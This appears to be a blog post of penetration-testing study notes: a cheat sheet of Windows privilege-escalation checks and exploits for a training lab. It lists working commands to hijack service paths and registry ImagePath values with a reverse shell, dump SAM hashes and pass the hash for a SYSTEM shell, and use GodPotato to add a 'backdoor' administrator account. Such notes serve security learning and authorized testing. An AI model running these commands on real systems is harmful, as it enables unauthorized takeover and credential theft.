2 minute read

./PowerUp.ps1 / ` Invoke-allChecks WinPEAS.exe doc - https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe colors REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1`

  1. kernel exploit:

    • Detection:
      • wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only
      • compare results with https://github.com/SecWiki/windows-kernel-exploits
    • Exploitation:
      • download pre-compiled versions from above link
      • manually compile exploit and upload to box

2-6 all service: (avoid rabbit holes)

WinPEAS ./winpeas servicesinfo must be able to MODIFY OR START/STOP SERVICE check that we can start stop service accesschk.exe /accepteula -ucqv <user> <reg>

  1. Service: Insecure Permissions:

    • Detection:
      • WinPEAS Modifiable Services - ChangeConfig
      • manually accesschk64.exe -wuvc USER *
    • Exploitation:
      • manually sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

  2. Service: Unquoted Service Path:

    • Detection:
      • WinPEAS no quotes and Space detected
        • Ceck for write permission icacls/ echo in directory then get service name:
        • wmic service get name,displayname,pathname,startmode
        • sc query state= all
      • manually accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
    • Exploitation:
      • manually create service binary, upload to path C:\Program Files\Unquoted Path Service\Common.exe, then sc stop NAME; sc start NAME

  3. Service: Weak Registry Permissions:

    • Detection:
      • WinPEAS (Interactive [Allow: FullControl])
      • manually .\accesschk64.exe -kwusv hklm\System\CurrentControlSet\Services | select-string -pattern GROUP/USER -casesensitive -context 7,7
    • Exploitation:
      • manually change bin path: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

  4. Service: Insecure Service Executable:

    • Detection:
      • WinPEAS File Permissions: Everyone [Allow: AllAccess]
      • manually accesschk64.exe -wuv FILE/DIRECTORY
    • Exploit:
      • manually create service binary, upload, then overwrite service file copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y

  5. DLL hijacking:

    • Detection:
      • WinPEAS (DLL Hijacking) in PATH
      • manually In process Monitor search for NAME NOT FOUND reg
    • Exploitation:
      • manually create DLL binary, upload to valid path, then sc stop NAME; sc start NAME

  6. Registry: autorun:

    • Detection:
      • WinPEAS ./winpeas applicationsinfo 
      • WinPEAS FilePerms: Everyone [AllAccess]
    • Exploitation:
      • manually create .exe, upload, then wait for administrator to log in

  7. Registry: AlwaysInstallElevated:

    • Detection:
      • WinPEAS ./winpeas windowscreds 
      • manually reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
      • and reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    • Exploitation:
      • manually create MSI binary, upload, then run

  8. Passwords: Registry

    • Detection:
      • WinPEAS ./winpeas filesinfo userinfo 
      • manually reg query HKLM /f password /t REG_SZ /s
      • manually reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
      • manual we can spawn shell from kali with registry found passwords with winexe -U 'admin%password' --system //10.10.74.192 cmd.exe

  9. Passwords: Saved Creds

    • Detection:
      • WinPEAS ./winpeas windowscreds 
      • manually cmdkey /list
    • Exploitation:
      • set listener and run runas /savecred /user:admin C:\PrivEsc\reverse.exe

  10. Passwords: Configuration Files

    • Detection:
      • WinPEAS ./winpeas searchfast filesinfo 
      • manually dir /s *pass* == *.config
      • manually findstr /si password *.xml *.ini *.txt

  11. Passwords: Security Account Manager (SAM)

    • Detection:
      • WinPEAS ./winpeas searchfast filesinfo  search for SAM and SYSTEM location
      • manually reg.exe save hklm\sam SAM reg.exe save hklm\system SYSTEM reg.exe save hklm\security SECURITY move to kali
      • manually dump impacket-secretsdump -sam 'path/to/SAM' -system 'path/to/system' LOCAL
    • Exploitation:
      • manually pass the hash pth-winexe --system -U 'admin%hash' //10.10.74.192 cmd.exe

  12. Scheduled tasks:

    • Detection:
      • manually interesting folders in C:/
      • PowerUp Get-ModifiableScheduledTaskFile
    • Exploitation:
      • manually create .exe, upload, then place file in identified location

  13. Insecure GUI Apps:

    • Detection:
      • manually tasklist /V | findstr mspaint.exe
    • Exploitation:
      • In Paint, click “File” and then “Open”. In the open file dialog box, click in the navigation input and paste: file://c:/windows/system32/cmd.exe

  14. Installed Applications:

    • Detection:
      • SeatBelt seatbelt.exe NonstandardProcesses
      • WinPEAS winPEASany.exe procesinfo
    • Exploitation:
      • search Exploit-DB

  15. Hot Potato:

    • Exploitation:
      • manually potato.exe -ip 10.10.10.10 -cmd "C:\PrivEsc\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true

  16. Token Impersonation:

    • Detection:
      • manual whoami /priv SeImpersonatePrivilege
    • Exploitation:
      • manually GodPotato.exe -cmd "net user /add backdoor Password123" GodPotato.exe -cmd "net localgroup administrators /add backdoor"

You May Also Enjoy